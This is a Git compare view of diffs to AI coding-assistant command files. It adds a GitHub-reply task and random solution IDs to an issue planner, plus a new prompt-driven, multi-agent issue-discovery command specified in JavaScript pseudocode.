Compare commits
29 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
6305f19bbb | ||
|
|
275d2cb0af | ||
|
|
d5f57d29ed | ||
|
|
7d8b13f34f | ||
|
|
340137d347 | ||
|
|
61cef8019a | ||
|
|
08308aa9ea | ||
|
|
94ae9e264c | ||
|
|
549e6e70e4 | ||
|
|
15514c8f91 | ||
|
|
29c8bb7a66 | ||
|
|
76f5311e78 | ||
|
|
ca6677149a | ||
|
|
880376aefc | ||
|
|
a20f81d44a | ||
|
|
a8627e7f68 | ||
|
|
4caa622942 | ||
|
|
6b8e73bd32 | ||
|
|
68c4c54b64 | ||
|
|
1dca4b06a2 | ||
|
|
a8ec42233f | ||
|
|
49a7c17ba8 | ||
|
|
8a15e08944 | ||
|
|
8c2d39d517 | ||
|
|
bf06f4ddcc | ||
|
|
28645aa4e4 | ||
|
|
cdcb517bc2 | ||
|
|
a63d547856 | ||
|
|
d994274023 |
@@ -138,7 +138,7 @@ Generate multiple candidate solutions when:
|
||||
**Task Decomposition** following schema:
|
||||
```javascript
|
||||
function decomposeTasks(issue, exploration) {
|
||||
return groups.map(group => ({
|
||||
const tasks = groups.map(group => ({
|
||||
id: `T${taskId++}`, // Pattern: ^T[0-9]+$
|
||||
title: group.title,
|
||||
scope: inferScope(group), // Module path
|
||||
@@ -161,7 +161,35 @@ function decomposeTasks(issue, exploration) {
|
||||
},
|
||||
depends_on: inferDependencies(group, tasks),
|
||||
priority: calculatePriority(group) // 1-5 (1=highest)
|
||||
}))
|
||||
}));
|
||||
|
||||
// GitHub Reply Task: Add final task if issue has github_url
|
||||
if (issue.github_url || issue.github_number) {
|
||||
const lastTaskId = tasks[tasks.length - 1]?.id;
|
||||
tasks.push({
|
||||
id: `T${taskId++}`,
|
||||
title: 'Reply to GitHub Issue',
|
||||
scope: 'github',
|
||||
action: 'Notify',
|
||||
description: `Comment on GitHub issue to report completion status`,
|
||||
modification_points: [],
|
||||
implementation: [
|
||||
`Generate completion summary (tasks completed, files changed)`,
|
||||
`Post comment via: gh issue comment ${issue.github_number || extractNumber(issue.github_url)} --body "..."`,
|
||||
`Include: solution approach, key changes, verification results`
|
||||
],
|
||||
test: { unit: [], commands: [] },
|
||||
acceptance: {
|
||||
criteria: ['GitHub comment posted successfully', 'Comment includes completion summary'],
|
||||
verification: ['Check GitHub issue for new comment']
|
||||
},
|
||||
commit: null, // No commit for notification task
|
||||
depends_on: lastTaskId ? [lastTaskId] : [], // Depends on last implementation task
|
||||
priority: 5 // Lowest priority (run last)
|
||||
});
|
||||
}
|
||||
|
||||
return tasks;
|
||||
}
|
||||
```
|
||||
|
||||
@@ -184,14 +212,14 @@ Write solution JSON to JSONL file (one line per solution):
|
||||
|
||||
**File Format** (JSONL - each line is a complete solution):
|
||||
```
|
||||
{"id":"SOL-GH-123-1","description":"...","approach":"...","analysis":{...},"score":0.85,"tasks":[...]}
|
||||
{"id":"SOL-GH-123-2","description":"...","approach":"...","analysis":{...},"score":0.75,"tasks":[...]}
|
||||
{"id":"SOL-GH-123-a7x9","description":"...","approach":"...","analysis":{...},"score":0.85,"tasks":[...]}
|
||||
{"id":"SOL-GH-123-b2k4","description":"...","approach":"...","analysis":{...},"score":0.75,"tasks":[...]}
|
||||
```
|
||||
|
||||
**Solution Schema** (must match CLI `Solution` interface):
|
||||
```typescript
|
||||
{
|
||||
id: string; // Format: SOL-{issue-id}-{N}
|
||||
id: string; // Format: SOL-{issue-id}-{uid}
|
||||
description?: string;
|
||||
approach?: string;
|
||||
tasks: SolutionTask[];
|
||||
@@ -204,9 +232,14 @@ Write solution JSON to JSONL file (one line per solution):
|
||||
**Write Operation**:
|
||||
```javascript
|
||||
// Append solution to JSONL file (one line per solution)
|
||||
const solutionId = `SOL-${issueId}-${seq}`;
|
||||
// Use 4-char random uid to avoid collisions across multiple plan runs
|
||||
const uid = Math.random().toString(36).slice(2, 6); // e.g., "a7x9"
|
||||
const solutionId = `SOL-${issueId}-${uid}`;
|
||||
const solutionLine = JSON.stringify({ id: solutionId, ...solution });
|
||||
|
||||
// Bash equivalent for uid generation:
|
||||
// uid=$(cat /dev/urandom | tr -dc 'a-z0-9' | head -c 4)
|
||||
|
||||
// Read existing, append new line, write back
|
||||
const filePath = `.workflow/issues/solutions/${issueId}.jsonl`;
|
||||
const existing = existsSync(filePath) ? readFileSync(filePath) : '';
|
||||
@@ -283,7 +316,8 @@ Each line is a solution JSON containing tasks. Schema: `cat .claude/workflows/cl
|
||||
6. Evaluate each solution with `analysis` and `score`
|
||||
7. Write solutions to `.workflow/issues/solutions/{issue-id}.jsonl` (append mode)
|
||||
8. For HIGH complexity: generate 2-3 candidate solutions
|
||||
9. **Solution ID format**: `SOL-{issue-id}-{N}` (e.g., `SOL-GH-123-1`, `SOL-GH-123-2`)
|
||||
9. **Solution ID format**: `SOL-{issue-id}-{uid}` where uid is 4 random alphanumeric chars (e.g., `SOL-GH-123-a7x9`)
|
||||
10. **GitHub Reply Task**: If issue has `github_url` or `github_number`, add final task to comment on GitHub issue with completion summary
|
||||
|
||||
**CONFLICT AVOIDANCE** (for batch processing of similar issues):
|
||||
1. **File isolation**: Each issue's solution should target distinct files when possible
|
||||
|
||||
764
.claude/commands/issue/discover-by-prompt.md
Normal file
@@ -0,0 +1,764 @@
|
||||
---
|
||||
name: issue:discover-by-prompt
|
||||
description: Discover issues from user prompt with Gemini-planned iterative multi-agent exploration. Uses ACE semantic search for context gathering and supports cross-module comparison (e.g., frontend vs backend API contracts).
|
||||
argument-hint: "<prompt> [--scope=src/**] [--depth=standard|deep] [--max-iterations=5]"
|
||||
allowed-tools: SlashCommand(*), TodoWrite(*), Read(*), Bash(*), Task(*), AskUserQuestion(*), Glob(*), Grep(*), mcp__ace-tool__search_context(*), mcp__exa__search(*)
|
||||
---
|
||||
|
||||
# Issue Discovery by Prompt
|
||||
|
||||
## Quick Start
|
||||
|
||||
```bash
|
||||
# Discover issues based on user description
|
||||
/issue:discover-by-prompt "Check if frontend API calls match backend implementations"
|
||||
|
||||
# Compare specific modules
|
||||
/issue:discover-by-prompt "Verify auth flow consistency between mobile and web clients" --scope=src/auth/**,src/mobile/**
|
||||
|
||||
# Deep exploration with more iterations
|
||||
/issue:discover-by-prompt "Find all places where error handling is inconsistent" --depth=deep --max-iterations=8
|
||||
|
||||
# Focused backend-frontend contract check
|
||||
/issue:discover-by-prompt "Compare REST API definitions with frontend fetch calls"
|
||||
```
|
||||
|
||||
**Core Difference from `/issue:discover`**:
|
||||
- `discover`: Pre-defined perspectives (bug, security, etc.), parallel execution
|
||||
- `discover-by-prompt`: User-driven prompt, Gemini-planned strategy, iterative exploration
|
||||
|
||||
## What & Why
|
||||
|
||||
### Core Concept
|
||||
|
||||
Prompt-driven issue discovery with intelligent planning. Instead of fixed perspectives, this command:
|
||||
|
||||
1. **Analyzes user intent** via Gemini to understand what to find
|
||||
2. **Plans exploration strategy** dynamically based on codebase structure
|
||||
3. **Executes iterative multi-agent exploration** with feedback loops
|
||||
4. **Performs cross-module comparison** when detecting comparison intent
|
||||
|
||||
### Value Proposition
|
||||
|
||||
1. **Natural Language Input**: Describe what you want to find, not how to find it
|
||||
2. **Intelligent Planning**: Gemini designs optimal exploration strategy
|
||||
3. **Iterative Refinement**: Each round builds on previous discoveries
|
||||
4. **Cross-Module Analysis**: Compare frontend/backend, mobile/web, old/new implementations
|
||||
5. **Adaptive Exploration**: Adjusts direction based on findings
|
||||
|
||||
### Use Cases
|
||||
|
||||
| Scenario | Example Prompt |
|
||||
|----------|----------------|
|
||||
| API Contract | "Check if frontend calls match backend endpoints" |
|
||||
| Error Handling | "Find inconsistent error handling patterns" |
|
||||
| Migration Gap | "Compare old auth with new auth implementation" |
|
||||
| Feature Parity | "Verify mobile has all web features" |
|
||||
| Schema Drift | "Check if TypeScript types match API responses" |
|
||||
| Integration | "Find mismatches between service A and service B" |
|
||||
|
||||
## How It Works
|
||||
|
||||
### Execution Flow
|
||||
|
||||
```
|
||||
Phase 1: Prompt Analysis & Initialization
|
||||
├─ Parse user prompt and flags
|
||||
├─ Detect exploration intent (comparison/search/verification)
|
||||
└─ Initialize discovery session
|
||||
|
||||
Phase 1.5: ACE Context Gathering
|
||||
├─ Use ACE semantic search to understand codebase structure
|
||||
├─ Identify relevant modules based on prompt keywords
|
||||
├─ Collect architecture context for Gemini planning
|
||||
└─ Build initial context package
|
||||
|
||||
Phase 2: Gemini Strategy Planning
|
||||
├─ Feed ACE context + prompt to Gemini CLI
|
||||
├─ Gemini analyzes and generates exploration strategy
|
||||
├─ Create exploration dimensions with search targets
|
||||
├─ Define comparison matrix (if comparison intent)
|
||||
└─ Set success criteria and iteration limits
|
||||
|
||||
Phase 3: Iterative Agent Exploration (with ACE)
|
||||
├─ Iteration 1: Initial exploration by assigned agents
|
||||
│ ├─ Agent A: ACE search + explore dimension 1
|
||||
│ ├─ Agent B: ACE search + explore dimension 2
|
||||
│ └─ Collect findings, update shared context
|
||||
├─ Iteration 2-N: Refined exploration
|
||||
│ ├─ Analyze previous findings
|
||||
│ ├─ ACE search for related code paths
|
||||
│ ├─ Execute targeted exploration
|
||||
│ └─ Update cumulative findings
|
||||
└─ Termination: Max iterations or convergence
|
||||
|
||||
Phase 4: Cross-Analysis & Synthesis
|
||||
├─ Compare findings across dimensions
|
||||
├─ Identify discrepancies and issues
|
||||
├─ Calculate confidence scores
|
||||
└─ Generate issue candidates
|
||||
|
||||
Phase 5: Issue Generation & Summary
|
||||
├─ Convert findings to issue format
|
||||
├─ Write discovery outputs
|
||||
└─ Prompt user for next action
|
||||
```
|
||||
|
||||
### Exploration Dimensions
|
||||
|
||||
Dimensions are **dynamically generated by Gemini** based on the user prompt. Not limited to predefined categories.
|
||||
|
||||
**Examples**:
|
||||
|
||||
| Prompt | Generated Dimensions |
|
||||
|--------|---------------------|
|
||||
| "Check API contracts" | frontend-calls, backend-handlers |
|
||||
| "Find auth issues" | auth-module (single dimension) |
|
||||
| "Compare old/new implementations" | legacy-code, new-code |
|
||||
| "Audit payment flow" | payment-service, validation, logging |
|
||||
| "Find error handling gaps" | error-handlers, error-types, recovery-logic |
|
||||
|
||||
Gemini analyzes the prompt + ACE context to determine:
|
||||
- How many dimensions are needed (1 to N)
|
||||
- What each dimension should focus on
|
||||
- Whether comparison is needed between dimensions
|
||||
|
||||
### Iteration Strategy
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────┐
|
||||
│ Iteration Loop │
|
||||
├─────────────────────────────────────────────────────────────┤
|
||||
│ 1. Plan: What to explore this iteration │
|
||||
│ └─ Based on: previous findings + unexplored areas │
|
||||
│ │
|
||||
│ 2. Execute: Launch agents for this iteration │
|
||||
│ └─ Each agent: explore → collect → return summary │
|
||||
│ │
|
||||
│ 3. Analyze: Process iteration results │
|
||||
│ └─ New findings? Gaps? Contradictions? │
|
||||
│ │
|
||||
│ 4. Decide: Continue or terminate │
|
||||
│ └─ Terminate if: max iterations OR convergence OR │
|
||||
│ high confidence on all questions │
|
||||
└─────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Core Responsibilities
|
||||
|
||||
### Phase 1: Prompt Analysis & Initialization
|
||||
|
||||
```javascript
|
||||
// Step 1: Parse arguments
|
||||
const { prompt, scope, depth, maxIterations } = parseArgs(args);
|
||||
|
||||
// Step 2: Generate discovery ID
|
||||
const discoveryId = `DBP-${formatDate(new Date(), 'YYYYMMDD-HHmmss')}`;
|
||||
|
||||
// Step 3: Create output directory
|
||||
const outputDir = `.workflow/issues/discoveries/${discoveryId}`;
|
||||
await mkdir(outputDir, { recursive: true });
|
||||
await mkdir(`${outputDir}/iterations`, { recursive: true });
|
||||
|
||||
// Step 4: Detect intent type from prompt
|
||||
const intentType = detectIntent(prompt);
|
||||
// Returns: 'comparison' | 'search' | 'verification' | 'audit'
|
||||
|
||||
// Step 5: Initialize discovery state
|
||||
await writeJson(`${outputDir}/discovery-state.json`, {
|
||||
discovery_id: discoveryId,
|
||||
type: 'prompt-driven',
|
||||
prompt: prompt,
|
||||
intent_type: intentType,
|
||||
scope: scope || '**/*',
|
||||
depth: depth || 'standard',
|
||||
max_iterations: maxIterations || 5,
|
||||
phase: 'initialization',
|
||||
created_at: new Date().toISOString(),
|
||||
iterations: [],
|
||||
cumulative_findings: [],
|
||||
comparison_matrix: null // filled for comparison intent
|
||||
});
|
||||
```
|
||||
|
||||
### Phase 1.5: ACE Context Gathering
|
||||
|
||||
**Purpose**: Use ACE semantic search to gather codebase context before Gemini planning.
|
||||
|
||||
```javascript
|
||||
// Step 1: Extract keywords from prompt for semantic search
|
||||
const keywords = extractKeywords(prompt);
|
||||
// e.g., "frontend API calls match backend" → ["frontend", "API", "backend", "endpoints"]
|
||||
|
||||
// Step 2: Use ACE to understand codebase structure
|
||||
const aceQueries = [
|
||||
`Project architecture and module structure for ${keywords.join(', ')}`,
|
||||
`Where are ${keywords[0]} implementations located?`,
|
||||
`How does ${keywords.slice(0, 2).join(' ')} work in this codebase?`
|
||||
];
|
||||
|
||||
const aceResults = [];
|
||||
for (const query of aceQueries) {
|
||||
const result = await mcp__ace-tool__search_context({
|
||||
project_root_path: process.cwd(),
|
||||
query: query
|
||||
});
|
||||
aceResults.push({ query, result });
|
||||
}
|
||||
|
||||
// Step 3: Build context package for Gemini (kept in memory)
|
||||
const aceContext = {
|
||||
prompt_keywords: keywords,
|
||||
codebase_structure: aceResults[0].result,
|
||||
relevant_modules: aceResults.slice(1).map(r => r.result),
|
||||
detected_patterns: extractPatterns(aceResults)
|
||||
};
|
||||
|
||||
// Step 4: Update state (no separate file)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
phase: 'context-gathered',
|
||||
ace_context: {
|
||||
queries_executed: aceQueries.length,
|
||||
modules_identified: aceContext.relevant_modules.length
|
||||
}
|
||||
});
|
||||
|
||||
// aceContext passed to Phase 2 in memory
|
||||
```
|
||||
|
||||
**ACE Query Strategy by Intent Type**:
|
||||
|
||||
| Intent | ACE Queries |
|
||||
|--------|-------------|
|
||||
| **comparison** | "frontend API calls", "backend API handlers", "API contract definitions" |
|
||||
| **search** | "{keyword} implementations", "{keyword} usage patterns" |
|
||||
| **verification** | "expected behavior for {feature}", "test coverage for {feature}" |
|
||||
| **audit** | "all {category} patterns", "{category} security concerns" |
|
||||
|
||||
### Phase 2: Gemini Strategy Planning
|
||||
|
||||
**Purpose**: Gemini analyzes user prompt + ACE context to design optimal exploration strategy.
|
||||
|
||||
```javascript
|
||||
// Step 1: Use ACE context gathered in Phase 1.5 (passed in memory; no ace-context.json file is written)
|
||||
// aceContext is already available from Phase 1.5
|
||||
|
||||
// Step 2: Build Gemini planning prompt with ACE context
|
||||
const planningPrompt = `
|
||||
PURPOSE: Analyze discovery prompt and create exploration strategy based on codebase context
|
||||
TASK:
|
||||
• Parse user intent from prompt: "${prompt}"
|
||||
• Use codebase context to identify specific modules and files to explore
|
||||
• Create exploration dimensions with precise search targets
|
||||
• Define comparison matrix structure (if comparison intent)
|
||||
• Set success criteria and iteration strategy
|
||||
MODE: analysis
|
||||
CONTEXT: @${scope || '**/*'} | Discovery type: ${intentType}
|
||||
|
||||
## Codebase Context (from ACE semantic search)
|
||||
${JSON.stringify(aceContext, null, 2)}
|
||||
|
||||
EXPECTED: JSON exploration plan following exploration-plan-schema.json:
|
||||
{
|
||||
"intent_analysis": { "type": "${intentType}", "primary_question": "...", "sub_questions": [...] },
|
||||
"dimensions": [{ "name": "...", "description": "...", "search_targets": [...], "focus_areas": [...], "agent_prompt": "..." }],
|
||||
"comparison_matrix": { "dimension_a": "...", "dimension_b": "...", "comparison_points": [...] },
|
||||
"success_criteria": [...],
|
||||
"estimated_iterations": N,
|
||||
"termination_conditions": [...]
|
||||
}
|
||||
RULES: $(cat ~/.claude/workflows/cli-templates/protocols/analysis-protocol.md) | Use ACE context to inform targets | Focus on actionable plan
|
||||
`;
|
||||
|
||||
// Step 3: Execute Gemini planning
|
||||
Bash({
|
||||
command: `ccw cli -p "${planningPrompt}" --tool gemini --mode analysis`,
|
||||
run_in_background: true,
|
||||
timeout: 300000
|
||||
});
|
||||
|
||||
// Step 4: Parse Gemini output and validate against schema
|
||||
const explorationPlan = await parseGeminiPlanOutput(geminiResult);
|
||||
validateAgainstSchema(explorationPlan, 'exploration-plan-schema.json');
|
||||
|
||||
// Step 5: Enhance plan with ACE-discovered file paths
|
||||
explorationPlan.dimensions = explorationPlan.dimensions.map(dim => ({
|
||||
...dim,
|
||||
ace_suggested_files: aceContext.relevant_modules
|
||||
.filter(m => m.relevance_to === dim.name)
|
||||
.map(m => m.file_path)
|
||||
}));
|
||||
|
||||
// Step 6: Update state (plan kept in memory, not persisted)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
phase: 'planned',
|
||||
exploration_plan: {
|
||||
dimensions_count: explorationPlan.dimensions.length,
|
||||
has_comparison_matrix: !!explorationPlan.comparison_matrix,
|
||||
estimated_iterations: explorationPlan.estimated_iterations
|
||||
}
|
||||
});
|
||||
|
||||
// explorationPlan passed to Phase 3 in memory
|
||||
```
|
||||
|
||||
**Gemini Planning Responsibilities**:
|
||||
|
||||
| Responsibility | Input | Output |
|
||||
|----------------|-------|--------|
|
||||
| Intent Analysis | User prompt | type, primary_question, sub_questions |
|
||||
| Dimension Design | ACE context + prompt | dimensions with search_targets |
|
||||
| Comparison Matrix | Intent type + modules | comparison_points (if applicable) |
|
||||
| Iteration Strategy | Depth setting | estimated_iterations, termination_conditions |
|
||||
|
||||
**Gemini Planning Output Schema**:
|
||||
|
||||
```json
|
||||
{
|
||||
"intent_analysis": {
|
||||
"type": "comparison|search|verification|audit",
|
||||
"primary_question": "string",
|
||||
"sub_questions": ["string"]
|
||||
},
|
||||
"dimensions": [
|
||||
{
|
||||
"name": "frontend",
|
||||
"description": "Client-side API calls and error handling",
|
||||
"search_targets": ["src/api/**", "src/hooks/**"],
|
||||
"focus_areas": ["fetch calls", "error boundaries", "response parsing"],
|
||||
"agent_prompt": "Explore frontend API consumption patterns..."
|
||||
},
|
||||
{
|
||||
"name": "backend",
|
||||
"description": "Server-side API implementations",
|
||||
"search_targets": ["src/server/**", "src/routes/**"],
|
||||
"focus_areas": ["endpoint handlers", "response schemas", "error responses"],
|
||||
"agent_prompt": "Explore backend API implementations..."
|
||||
}
|
||||
],
|
||||
"comparison_matrix": {
|
||||
"dimension_a": "frontend",
|
||||
"dimension_b": "backend",
|
||||
"comparison_points": [
|
||||
{"aspect": "endpoints", "frontend_check": "fetch URLs", "backend_check": "route paths"},
|
||||
{"aspect": "methods", "frontend_check": "HTTP methods used", "backend_check": "methods accepted"},
|
||||
{"aspect": "payloads", "frontend_check": "request body structure", "backend_check": "expected schema"},
|
||||
{"aspect": "responses", "frontend_check": "response parsing", "backend_check": "response format"},
|
||||
{"aspect": "errors", "frontend_check": "error handling", "backend_check": "error responses"}
|
||||
]
|
||||
},
|
||||
"success_criteria": [
|
||||
"All API endpoints mapped between frontend and backend",
|
||||
"Discrepancies identified with file:line references",
|
||||
"Each finding includes remediation suggestion"
|
||||
],
|
||||
"estimated_iterations": 3,
|
||||
"termination_conditions": [
|
||||
"All comparison points verified",
|
||||
"No new findings in last iteration",
|
||||
"Confidence > 0.8 on primary question"
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 3: Iterative Agent Exploration (with ACE)
|
||||
|
||||
**Purpose**: Multi-agent iterative exploration using ACE for semantic search within each iteration.
|
||||
|
||||
```javascript
|
||||
let iteration = 0;
|
||||
let cumulativeFindings = [];
|
||||
let sharedContext = { aceDiscoveries: [], crossReferences: [] };
|
||||
let shouldContinue = true;
|
||||
|
||||
while (shouldContinue && iteration < maxIterations) {
|
||||
iteration++;
|
||||
const iterationDir = `${outputDir}/iterations/${iteration}`;
|
||||
await mkdir(iterationDir, { recursive: true });
|
||||
|
||||
// Step 1: ACE-assisted iteration planning
|
||||
// Use previous findings to guide ACE queries for this iteration
|
||||
const iterationAceQueries = iteration === 1
|
||||
? explorationPlan.dimensions.map(d => d.focus_areas[0]) // Initial queries from plan
|
||||
: deriveQueriesFromFindings(cumulativeFindings); // Follow-up queries from findings
|
||||
|
||||
// Execute ACE searches to find related code
|
||||
const iterationAceResults = [];
|
||||
for (const query of iterationAceQueries) {
|
||||
const result = await mcp__ace-tool__search_context({
|
||||
project_root_path: process.cwd(),
|
||||
      query: `${query} in ${scope || '**/*'}`
|
||||
});
|
||||
iterationAceResults.push({ query, result });
|
||||
}
|
||||
|
||||
// Update shared context with ACE discoveries
|
||||
sharedContext.aceDiscoveries.push(...iterationAceResults);
|
||||
|
||||
// Step 2: Plan this iteration based on ACE results
|
||||
const iterationPlan = planIteration(iteration, explorationPlan, cumulativeFindings, iterationAceResults);
|
||||
|
||||
// Step 3: Launch dimension agents with ACE context
|
||||
const agentPromises = iterationPlan.dimensions.map(dimension =>
|
||||
Task({
|
||||
subagent_type: "cli-explore-agent",
|
||||
run_in_background: false,
|
||||
description: `Explore ${dimension.name} (iteration ${iteration})`,
|
||||
prompt: buildDimensionPromptWithACE(dimension, iteration, cumulativeFindings, iterationAceResults, iterationDir)
|
||||
})
|
||||
);
|
||||
|
||||
// Wait for iteration agents
|
||||
const iterationResults = await Promise.all(agentPromises);
|
||||
|
||||
// Step 4: Collect and analyze iteration findings
|
||||
const iterationFindings = await collectIterationFindings(iterationDir, iterationPlan.dimensions);
|
||||
|
||||
// Step 5: Cross-reference findings between dimensions
|
||||
if (iterationPlan.dimensions.length > 1) {
|
||||
const crossRefs = findCrossReferences(iterationFindings, iterationPlan.dimensions);
|
||||
sharedContext.crossReferences.push(...crossRefs);
|
||||
}
|
||||
|
||||
cumulativeFindings.push(...iterationFindings);
|
||||
|
||||
// Step 6: Decide whether to continue
|
||||
const convergenceCheck = checkConvergence(iterationFindings, cumulativeFindings, explorationPlan);
|
||||
shouldContinue = !convergenceCheck.converged;
|
||||
|
||||
// Step 7: Update state (iteration summary embedded in state)
|
||||
await updateDiscoveryState(outputDir, {
|
||||
iterations: [...state.iterations, {
|
||||
number: iteration,
|
||||
findings_count: iterationFindings.length,
|
||||
ace_queries: iterationAceQueries.length,
|
||||
cross_references: sharedContext.crossReferences.length,
|
||||
new_discoveries: convergenceCheck.newDiscoveries,
|
||||
confidence: convergenceCheck.confidence,
|
||||
continued: shouldContinue
|
||||
}],
|
||||
cumulative_findings: cumulativeFindings
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
**ACE in Iteration Loop**:
|
||||
|
||||
```
|
||||
Iteration N
|
||||
│
|
||||
├─→ ACE Search (based on previous findings)
|
||||
│ └─ Query: "related code paths for {finding.category}"
|
||||
│ └─ Result: Additional files to explore
|
||||
│
|
||||
├─→ Agent Exploration (with ACE context)
|
||||
│ └─ Agent receives: dimension targets + ACE suggestions
|
||||
│ └─ Agent can call ACE for deeper search
|
||||
│
|
||||
├─→ Cross-Reference Analysis
|
||||
│ └─ Compare findings between dimensions
|
||||
│ └─ Identify discrepancies
|
||||
│
|
||||
└─→ Convergence Check
|
||||
└─ New findings? Continue
|
||||
└─ No new findings? Terminate
|
||||
```
|
||||
|
||||
**Dimension Agent Prompt Template (with ACE)**:
|
||||
|
||||
```javascript
|
||||
function buildDimensionPromptWithACE(dimension, iteration, previousFindings, aceResults, outputDir) {
|
||||
// Filter ACE results relevant to this dimension
|
||||
const relevantAceResults = aceResults.filter(r =>
|
||||
r.query.includes(dimension.name) || dimension.focus_areas.some(fa => r.query.includes(fa))
|
||||
);
|
||||
|
||||
return `
|
||||
## Task Objective
|
||||
Explore ${dimension.name} dimension for issue discovery (Iteration ${iteration})
|
||||
|
||||
## Context
|
||||
- Dimension: ${dimension.name}
|
||||
- Description: ${dimension.description}
|
||||
- Search Targets: ${dimension.search_targets.join(', ')}
|
||||
- Focus Areas: ${dimension.focus_areas.join(', ')}
|
||||
|
||||
## ACE Semantic Search Results (Pre-gathered)
|
||||
The following files/code sections were identified by ACE as relevant to this dimension:
|
||||
${JSON.stringify(relevantAceResults.map(r => ({ query: r.query, files: r.result.slice(0, 5) })), null, 2)}
|
||||
|
||||
**Use ACE for deeper exploration**: You have access to mcp__ace-tool__search_context.
|
||||
When you find something interesting, use ACE to find related code:
|
||||
- mcp__ace-tool__search_context({ project_root_path: ".", query: "related to {finding}" })
|
||||
|
||||
${iteration > 1 ? `
|
||||
## Previous Findings to Build Upon
|
||||
${summarizePreviousFindings(previousFindings, dimension.name)}
|
||||
|
||||
## This Iteration Focus
|
||||
- Explore areas not yet covered (check ACE results for new files)
|
||||
- Verify/deepen previous findings
|
||||
- Follow leads from previous discoveries
|
||||
- Use ACE to find cross-references between dimensions
|
||||
` : ''}
|
||||
|
||||
## MANDATORY FIRST STEPS
|
||||
1. Review the exploration plan details embedded in this prompt (the plan is kept in memory, not written to disk)
|
||||
2. Read schema: ~/.claude/workflows/cli-templates/schemas/discovery-finding-schema.json
|
||||
3. Review ACE results above for starting points
|
||||
4. Explore files identified by ACE
|
||||
|
||||
## Exploration Instructions
|
||||
${dimension.agent_prompt}
|
||||
|
||||
## ACE Usage Guidelines
|
||||
- Use ACE when you need to find:
|
||||
- Where a function/class is used
|
||||
- Related implementations in other modules
|
||||
- Cross-module dependencies
|
||||
- Similar patterns elsewhere in codebase
|
||||
- Query format: Natural language, be specific
|
||||
- Example: "Where is UserService.authenticate called from?"
|
||||
|
||||
## Output Requirements
|
||||
|
||||
**1. Write JSON file**: ${outputDir}/${dimension.name}.json
|
||||
Follow discovery-finding-schema.json:
|
||||
- findings: [{id, title, category, description, file, line, snippet, confidence, related_dimension}]
|
||||
- coverage: {files_explored, areas_covered, areas_remaining}
|
||||
- leads: [{description, suggested_search}] // for next iteration
|
||||
- ace_queries_used: [{query, result_count}] // track ACE usage
|
||||
|
||||
**2. Return summary**:
|
||||
- Total findings this iteration
|
||||
- Key discoveries
|
||||
- ACE queries that revealed important code
|
||||
- Recommended next exploration areas
|
||||
|
||||
## Success Criteria
|
||||
- [ ] JSON written to ${outputDir}/${dimension.name}.json
|
||||
- [ ] Each finding has file:line reference
|
||||
- [ ] ACE used for cross-references where applicable
|
||||
- [ ] Coverage report included
|
||||
- [ ] Leads for next iteration identified
|
||||
`;
|
||||
}
|
||||
```
|
||||
|
||||
### Phase 4: Cross-Analysis & Synthesis
|
||||
|
||||
```javascript
|
||||
// For comparison intent, perform cross-analysis
|
||||
if (intentType === 'comparison' && explorationPlan.comparison_matrix) {
|
||||
const comparisonResults = [];
|
||||
|
||||
for (const point of explorationPlan.comparison_matrix.comparison_points) {
|
||||
const dimensionAFindings = cumulativeFindings.filter(f =>
|
||||
f.related_dimension === explorationPlan.comparison_matrix.dimension_a &&
|
||||
f.category.includes(point.aspect)
|
||||
);
|
||||
|
||||
const dimensionBFindings = cumulativeFindings.filter(f =>
|
||||
f.related_dimension === explorationPlan.comparison_matrix.dimension_b &&
|
||||
f.category.includes(point.aspect)
|
||||
);
|
||||
|
||||
// Compare and find discrepancies
|
||||
const discrepancies = findDiscrepancies(dimensionAFindings, dimensionBFindings, point);
|
||||
|
||||
comparisonResults.push({
|
||||
aspect: point.aspect,
|
||||
dimension_a_count: dimensionAFindings.length,
|
||||
dimension_b_count: dimensionBFindings.length,
|
||||
discrepancies: discrepancies,
|
||||
match_rate: calculateMatchRate(dimensionAFindings, dimensionBFindings)
|
||||
});
|
||||
}
|
||||
|
||||
// Write comparison analysis
|
||||
await writeJson(`${outputDir}/comparison-analysis.json`, {
|
||||
matrix: explorationPlan.comparison_matrix,
|
||||
results: comparisonResults,
|
||||
summary: {
|
||||
total_discrepancies: comparisonResults.reduce((sum, r) => sum + r.discrepancies.length, 0),
|
||||
overall_match_rate: average(comparisonResults.map(r => r.match_rate)),
|
||||
critical_mismatches: comparisonResults.filter(r => r.match_rate < 0.5)
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
// Prioritize all findings
|
||||
const prioritizedFindings = prioritizeFindings(cumulativeFindings, explorationPlan);
|
||||
```
|
||||
|
||||
### Phase 5: Issue Generation & Summary
|
||||
|
||||
```javascript
|
||||
// Promote findings to issue candidates: keep anything we are confident about
// (>= 0.7) or that is flagged critical/high regardless of confidence.
const isIssueWorthy = (f) =>
  f.confidence >= 0.7 || f.priority === 'critical' || f.priority === 'high';

const candidateFindings = prioritizedFindings.filter(isIssueWorthy);

// Shape one finding into the persisted issue record, preserving traceability
// back to the discovery session and originating dimension.
const toIssue = (finding) => ({
  id: `ISS-${discoveryId}-${finding.id}`,
  title: finding.title,
  description: finding.description,
  source: {
    discovery_id: discoveryId,
    finding_id: finding.id,
    dimension: finding.related_dimension
  },
  file: finding.file,
  line: finding.line,
  priority: finding.priority,
  category: finding.category,
  suggested_fix: finding.suggested_fix,
  confidence: finding.confidence,
  status: 'discovered',
  created_at: new Date().toISOString()
});

const generatedIssues = candidateFindings.map(toIssue);

// Persist issue candidates
await writeJsonl(`${outputDir}/discovery-issues.jsonl`, generatedIssues);

// Final state update — the summary lives inside the state file, no separate summary artifact.
await updateDiscoveryState(outputDir, {
  phase: 'complete',
  updated_at: new Date().toISOString(),
  results: {
    total_iterations: iteration,
    total_findings: cumulativeFindings.length,
    issues_generated: generatedIssues.length,
    comparison_match_rate: comparisonResults
      ? average(comparisonResults.map((r) => r.match_rate))
      : null
  }
});

// Hand control back to the user to pick the follow-up action.
await AskUserQuestion({
  questions: [
    {
      question: `Discovery complete: ${generatedIssues.length} issues from ${cumulativeFindings.length} findings across ${iteration} iterations. What next?`,
      header: "Next Step",
      multiSelect: false,
      options: [
        { label: "Export to Issues (Recommended)", description: `Export ${generatedIssues.length} issues for planning` },
        { label: "Review Details", description: "View comparison analysis and iteration details" },
